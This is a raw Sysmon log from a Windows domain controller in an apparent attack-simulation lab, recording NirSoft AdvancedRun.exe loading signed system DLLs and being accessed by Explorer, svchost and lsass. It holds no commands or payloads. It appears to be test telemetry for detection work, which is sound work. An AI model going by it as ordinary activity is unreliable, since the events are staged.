21:40:32.207{834264DD-0DC0-61E7-ED00-000000002402}46445028C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925988Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:32.207{834264DD-0DC0-61E7-ED00-000000002402}46445028C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925987Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
21:40:32.203{834264DD-0DC0-61E7-ED00-000000002402}46445028C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925986Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:32.183{834264DD-0DBF-61E7-E700-000000002402}42324352C:\Windows\system32\taskhostw.exe{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925985Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
21:40:32.183{834264DD-0DBF-61E7-E700-000000002402}42324352C:\Windows\system32\taskhostw.exe{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925984Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:32.179{834264DD-0DC0-61E7-ED00-000000002402}46444820C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925983Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:32.179{834264DD-0DC0-61E7-ED00-000000002402}46444820C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925982Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
21:40:32.179{834264DD-0DC0-61E7-ED00-000000002402}46444820C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002925981Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:32.179{834264DD-0DC0-61E7-ED00-000000002402}46444820C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000002925980Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.970{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=5F9B6C9B05956273CC91C5E70B2456EE,SHA256=F51014AC7DD24D56F5C22D8EB33DC1385C0A0A038C510B974BDE6068B5F335F9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925955Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
21:40:31.959{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925952Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.827{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925927Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.794{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=CBC1377206ACF2A0AA01E96404DFD737,SHA256=D2B72B003C278FBECF32DAEDEB9B3CF88746E9ED33B8739F4FD96EFAB494F244trueNir SoferValidATTACKRANGE\Administrator 734700x80000000000000002925901Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.842{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft 
Corporationdwmapi.dllMD5=74621C6ABE4E9A568DF0A38E7282D71E,SHA256=0788A092D47800D0EB120A7DBB9E59234D0722A4A2E80ECE6CE70E3A84A3750AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925900Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.842{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925899Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.842{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925898Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.842{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=E2374A214A9F0C8347C29EBDE3447986,SHA256=F2260FE7E0C4E92D49CF0F550E2A1B3D3F1D2D76E6F5C8F16B0E16B6117D9EE1trueMicrosoft WindowsValidATTACKRANGE\Administrator 
10341000x80000000000000002925897Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.840{834264DD-0AB0-61E7-1600-000000002402}12923060C:\Windows\system32\svchost.exe{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000002925896Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.840{834264DD-0AB0-61E7-1600-000000002402}12921332C:\Windows\system32\svchost.exe{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000002925895Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.840{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValidATTACKRANGE\Administrator 
10341000x80000000000000002925894Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.835{834264DD-0AAD-61E7-0B00-000000002402}6286396C:\Windows\system32\lsass.exe{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000002925891Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.835{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925890Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.830{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® 
Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925889Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.827{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=8634E667D69FFD4CFC0A419A3199B619,SHA256=E87E08EB14BA4D49355BC49ED0DD79E2009528B88FA32B84F14F793064C488A0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925888Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.824{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925886Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.824{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000002925883Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.818{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=64E62BD24E8900EC8B43F85070B10ED5,SHA256=3FF8E8AD93BB746BCEDF8CCF0365B251E85A18BDCF23B99BBD16FCC180A2F063trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925882Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.818{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925881Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.810{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=35850E39E505D72FF7A68B8E5AFF9CA1,SHA256=1A280FA6EE31584C215CCC47DD6A8A231C8E28451800C276A27AD185A4AC06F7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925880Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
21:40:31.810{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925879Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.810{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925878Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.804{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925877Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.804{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft 
CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925876Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.804{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=0DB1A588A248E852AD781AE14333A5C6,SHA256=6F9C36C2663B90439A1AEE74855C521FCBBDB8C7B88382C9464906F1691F65F6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925875Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.804{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925874Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.804{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=1223B41C4E7FF5638F168B51A08B8D19,SHA256=8B3F788B7DAB5C92150CCE73BB8D78E22359B457B025B1F17394AAE40CBC2918trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000002925873Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.804{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=17F9517D037D676FE11AE7B4F232CB0E,SHA256=9C9990CFCD1C66152D16037FD81FE2A202AA3B19D438121318A36887E282F76EtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925872Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.804{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=9AB440B89EFD6749750CC57D1FA6B8E1,SHA256=13C83EC8F62D4D045819235D7E2435721B525B94C313020FAE8340FCEA730FF2trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925871Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.804{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=E0F286AF345442E267C33880492CED31,SHA256=5C6D66F5A748551999BE1CDE33A3A1FC2E10D1297EF275D232A9FDCC95BEA84BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925870Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.804{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking 
and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925869Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.804{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925868Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 